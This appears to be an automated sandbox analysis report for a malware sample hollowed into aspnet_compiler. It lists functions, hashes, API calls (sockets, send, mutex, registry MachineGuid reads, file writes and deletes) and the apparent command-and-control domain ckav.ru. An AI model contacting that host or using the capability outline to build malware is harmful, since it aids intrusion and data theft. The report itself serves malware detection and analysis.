Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 00406304
IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98

Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8

Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00403C40 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

